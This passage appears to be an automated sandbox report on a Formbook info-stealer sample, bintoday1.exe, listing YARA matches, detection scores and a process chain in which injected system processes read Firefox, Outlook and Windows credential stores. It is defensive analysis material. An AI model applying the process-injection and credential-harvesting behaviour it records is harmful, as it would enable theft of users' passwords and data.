Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03041F92 2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFFB1 2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03049EB0 2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03043D40 2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F1D5A 2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F7D73 2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305FDC0 2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B9C32 2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFCF2 2_2_030FFCF2
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_03334F14 6_2_03334F14
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_03355A6A 6_2_03355A6A
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_03334F86 6_2_03334F86
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333D603 6_2_0333D603
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333D645 6_2_0333D645
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333D64A 6_2_0333D64A
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_03336EEA 6_2_03336EEA
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_0333F45A 6_2_0333F45A
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Code function: 6_2_03336CCA 6_2_03336CCA
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E202C0 7_2_02E202C0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E40274 7_2_02E40274
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E603E6 7_2_02E603E6
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DAE3F0 7_2_02DAE3F0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5A352 7_2_02E5A352
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E32000 7_2_02E32000
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E581CC 7_2_02E581CC
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E541A2 7_2_02E541A2
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E601AA 7_2_02E601AA
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E28158 7_2_02E28158
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D90100 7_2_02D90100
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E3A118 7_2_02E3A118
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DBC6E0 7_2_02DBC6E0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D9C7C0 7_2_02D9C7C0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DC4750 7_2_02DC4750
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA0770 7_2_02DA0770
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E4E4F6 7_2_02E4E4F6
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E52446 7_2_02E52446
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E44420 7_2_02E44420
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E60591 7_2_02E60591
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA0535 7_2_02DA0535
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D9EA80 7_2_02D9EA80
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E56BD7 7_2_02E56BD7
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5AB40 7_2_02E5AB40
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DCE8F0 7_2_02DCE8F0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D868B8 7_2_02D868B8
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA2840 7_2_02DA2840
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DAA840 7_2_02DAA840
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E6A9A6 7_2_02E6A9A6
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA29A0 7_2_02DA29A0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DB6962 7_2_02DB6962
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5EEDB 7_2_02E5EEDB
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DB2E90 7_2_02DB2E90
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5CE93 7_2_02E5CE93
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA0E59 7_2_02DA0E59
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5EE26 7_2_02E5EE26
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D92FC8 7_2_02D92FC8
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DACFE0 7_2_02DACFE0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E1EFA0 7_2_02E1EFA0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E14F40 7_2_02E14F40
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E42F30 7_2_02E42F30
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DC0F30 7_2_02DC0F30
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DE2F28 7_2_02DE2F28
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D90CF2 7_2_02D90CF2
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E40CB5 7_2_02E40CB5
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA0C00 7_2_02DA0C00
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D9ADE0 7_2_02D9ADE0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DB8DBF 7_2_02DB8DBF
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DAAD00 7_2_02DAAD00
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E3CD1F 7_2_02E3CD1F
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E412ED 7_2_02E412ED
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DBB2C0 7_2_02DBB2C0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA52A0 7_2_02DA52A0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DE739A 7_2_02DE739A
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D8D34C 7_2_02D8D34C
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5132D 7_2_02E5132D
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5F0E0 7_2_02E5F0E0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E570E9 7_2_02E570E9
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA70C0 7_2_02DA70C0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E4F0CC 7_2_02E4F0CC
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DAB1B0 7_2_02DAB1B0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E6B16B 7_2_02E6B16B
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D8F172 7_2_02D8F172
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD516C 7_2_02DD516C
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E516CC 7_2_02E516CC
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DE5630 7_2_02DE5630
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5F7B0 7_2_02E5F7B0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02D91460 7_2_02D91460
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5F43F 7_2_02E5F43F
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E695C3 7_2_02E695C3
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E3D5B0 7_2_02E3D5B0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E57571 7_2_02E57571
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E4DAC6 7_2_02E4DAC6
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E41AA3 7_2_02E41AA3
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E3DAAC 7_2_02E3DAAC
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DE5AA0 7_2_02DE5AA0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E13A6C 7_2_02E13A6C
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E57A46 7_2_02E57A46
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5FA49 7_2_02E5FA49
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E15BF0 7_2_02E15BF0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DDDBF9 7_2_02DDDBF9
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DBFB80 7_2_02DBFB80
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5FB76 7_2_02E5FB76
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA38E0 7_2_02DA38E0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E0D800 7_2_02E0D800
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA9950 7_2_02DA9950
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DBB950 7_2_02DBB950
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E35910 7_2_02E35910
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA9EB0 7_2_02DA9EB0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA1F92 7_2_02DA1F92
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5FFB1 7_2_02E5FFB1
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5FF09 7_2_02E5FF09
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E5FCF2 7_2_02E5FCF2
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E19C32 7_2_02E19C32
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DBFDC0 7_2_02DBFDC0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E57D73 7_2_02E57D73
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DA3D40 7_2_02DA3D40
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02E51D5A 7_2_02E51D5A
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004E1C80 7_2_004E1C80
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004DCB90 7_2_004DCB90
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004DCDB0 7_2_004DCDB0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004DAE30 7_2_004DAE30
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004E5320 7_2_004E5320
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004E34C9 7_2_004E34C9
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004E350B 7_2_004E350B
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004E3510 7_2_004E3510
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004FB930 7_2_004FB930
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADE458 7_2_00ADE458
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADE454 7_2_00ADE454
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADE573 7_2_00ADE573
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADC995 7_2_00ADC995
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADE90C 7_2_00ADE90C
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADD978 7_2_00ADD978
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADCC08 7_2_00ADCC08
Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 02E1F290 appears 105 times
Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 02D8B970 appears 280 times
Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 02DE7E54 appears 111 times
Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 02DD5130 appears 58 times
Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 02E0EA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03087E54 appears 102 times
Source: C:\Users\user\Desktop\bintoday1.exe Code function: String function: 00B99CB3 appears 31 times
Source: C:\Users\user\Desktop\bintoday1.exe Code function: String function: 00BAF9F2 appears 40 times
Source: C:\Users\user\Desktop\bintoday1.exe Code function: String function: 00BB0A30 appears 46 times
Source: bintoday1.exe, 00000000.00000003.2188299011.0000000003A4D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs bintoday1.exe
Source: bintoday1.exe, 00000000.00000003.2183977537.0000000003853000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs bintoday1.exe
Source: bintoday1.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@9/8
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C037B5 GetLastError,FormatMessageW, 0_2_00C037B5
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BF10BF AdjustTokenPrivileges,CloseHandle, 0_2_00BF10BF
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BF16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00BF16C3
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C051CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00C051CD
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C1A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00C1A67C
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00C0648E
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B942A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00B942A2
Source: C:\Users\user\Desktop\bintoday1.exe File created: C:\Users\user\AppData\Local\Temp\aut76CA.tmp Jump to behavior
Source: bintoday1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: compact.exe, 00000007.00000002.4015509843.000000000077F000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2646911279.0000000000789000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2644521853.000000000075E000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2644663587.000000000077F000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4015509843.00000000007AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: bintoday1.exe Virustotal: Detection: 63%
Source: bintoday1.exe ReversingLabs: Detection: 63%
Source: unknown Process created: C:\Users\user\Desktop\bintoday1.exe "C:\Users\user\Desktop\bintoday1.exe"
Source: C:\Users\user\Desktop\bintoday1.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bintoday1.exe"
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
Source: C:\Windows\SysWOW64\compact.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\bintoday1.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bintoday1.exe" Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe" Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\compact.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: bintoday1.exe Static file information: File size 1274880 > 1048576
